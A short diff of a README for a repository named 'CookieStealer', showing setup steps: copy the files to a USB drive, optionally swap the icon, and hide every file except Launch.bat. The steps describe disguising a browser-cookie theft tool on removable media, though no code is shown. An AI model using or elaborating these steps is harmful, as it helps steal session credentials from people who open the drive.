roledxd/CookieStealer/README.md

 ```
 1. Clone files from repository to USB Drive (1GB Optimal capacity).

-2. You can change the Icon.ico, but with the ICO extension.
+2. You can change the Icon (.ico only).

 3. Set all files as Hidden except Launch.bat.